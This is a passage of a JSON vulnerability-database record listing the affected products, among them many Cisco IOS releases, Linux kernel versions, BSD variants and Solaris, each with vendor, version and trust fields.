            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(3a\\)e7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(2\\)e1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5c\\)e12"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14.5\\)t"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.23"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.14.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xj"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(22\\)ea3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yw"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(4\\)xm"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)yc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ey"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(13\\)s6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(9.4\\)da"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(17\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)t9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.29"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(1\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.53"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8a\\)e"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(3i\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(9\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)by"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(2\\)xb"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.8.1.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)sz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(26b\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(22\\)s2"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.35"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zl"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.21"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16\\)sc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xh3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)ja"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2ew"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2eu"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xr"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.1\\(24a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xm"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1sec"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)t16"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(10\\)e"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wc5a"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.32"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.5.8"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.18.3"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4\\(3a\\)"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "bsd os",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsdi",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(18\\)sxd4"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.23.7"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(16f\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(22\\)e3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)seb2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(1\\)xd"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(24\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)ew4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)sv2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(6.8\\)t0a"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)xv"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(12.02\\)s"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)ew"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(14\\)s"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1\\)db"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(11\\)yf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xr"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(4\\)xg4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2dx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)e1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)xm"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(17\\)"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.2.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1c\\)"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "2.0.4"
          },
          {
            "_id": null,
            "model": "windows vista",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(26\\)s2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ewa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(5e\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2bx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5.1\\)xp"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3xa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2su"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.13"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yc2"
          },
          {
            "_id": null,
            "model": "dragonflybsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dragonflybsd",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(9\\)ex3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(3.4\\)t"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.38"
          },
          {
            "_id": null,
            "model": "bsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsd",
            "version": null
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(13\\)"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "2.1.6.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2zk"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.14"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.11"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(14\\)eb"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)ja"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.12"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.4.12"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.13"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.2.19"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(1.3\\)t"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)xm2"
          },
          {
            "_id": null,
            "model": "dragonflybsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dragonflybsd",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xy6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)yc"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(8b\\)e14"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(13\\)zh"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2za"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)seb4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2yf"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "freebsd",
            "version": "3.4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3ye"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.3.51"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1db"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.14"
          },
          {
            "_id": null,
            "model": "bsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "bsd",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ez1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(13\\)e9"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(8\\)sa1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1xe"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(4\\)"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openbsd",
            "version": "2.6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(2\\)xd"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "netbsd",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(6.8a\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)ea1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0xs"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.0.9.9"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.20.5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xb4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.0\\(20.3\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)xa5"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(5\\)xu1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(2\\)b"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3\\(7\\)t10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(11b\\)t2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(16\\)s10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2sxa"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(6\\)ez2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(7\\)t3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(4\\)b3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(11\\)ja"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.1.89"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.22.3"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(17\\)sl2"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.4ja"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.17.10"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)ex"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(25\\)s6"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.3wa4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(10\\)da4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "11.2\\(15\\)g"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(15\\)jk4"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(20\\)ew"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2xf"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3yl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.1\\(12\\)e"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.16.17"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0sl"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(5\\)wx"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.0\\(15a\\)"
          },
          {
            "_id": null,
            "model": "kernel",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "linux",
            "version": "2.6.11.8"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3xz"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.3jea"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2\\(20\\)s1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "12.2fy"
          },
          {
            "_id": null,
            "model": "catos glx",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "cisco",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "extreme",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "force10",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "linux kernel archives",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "red hat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "the sco group",
            "version": null
          },
          {
            "_id": null,
            "model": "seil/b1",
            "scope": null,
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": null
          },
          {
            "_id": null,
            "model": "seil/neu",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": "128"
          },
          {
            "_id": null,
            "model": "seil/neu",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": "2fe plus"
          },
          {
            "_id": null,
            "model": "seil/turbo",
            "scope": null,
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": null
          },
          {
            "_id": null,
            "model": "seil/x1,x2",
            "scope": null,
            "trust": 0.8,
            "vendor": "internet initiative",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "(sparc)"
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "(x86)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "8 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "8 (x86)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (sparc)"
          },
          {
            "_id": null,
            "model": "solaris",
            "scope": "eq",
